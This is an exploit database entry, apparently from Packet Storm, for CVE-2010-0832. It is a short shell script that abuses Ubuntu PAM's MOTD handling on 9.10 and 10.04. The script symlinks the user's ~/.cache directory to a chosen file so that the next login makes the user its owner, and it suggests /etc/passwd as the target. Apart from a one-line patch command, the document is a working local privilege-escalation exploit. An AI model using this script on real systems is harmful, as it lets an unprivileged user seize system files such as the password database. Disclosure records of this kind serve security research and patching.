Ubuntu PAM MOTD File Tampering Privilege Escalation

2010-07-08T00:00:00
ID PACKETSTORM:91613
Type packetstorm
Reporter Kristian Hermansen
Modified 2010-07-08T00:00:00

Description

                                        
                                            `#!/bin/sh  
#  
# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)  
# Date: July 7, 2010  
# Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>  
# Software Link: http://packages.ubuntu.com/  
# Version: pam-1.1.0  
# Tested on: Ubuntu 10.04 LTS (Lucid Lynx)  
# CVE : CVE-2010-0832  
#  
# Notes: Affects Ubuntu 9.10 and 10.04 LTS  
# [Patch Instructions]  
# $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i  
#  
  
if [ $# -eq 0 ]; then  
echo "Usage: $0 /path/to/file"  
exit 1  
fi  
  
mkdir $HOME/backup 2> /dev/null  
tmpdir=$(mktemp -d --tmpdir=$HOME/backup/)  
mv $HOME/.cache/ $tmpdir 2> /dev/null  
echo "\n@@@ File before tampering ...\n"  
ls -l $1  
ln -sf $1 $HOME/.cache  
echo "\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :) File will then be owned by your user. Try /etc/passwd...\n"  
  
`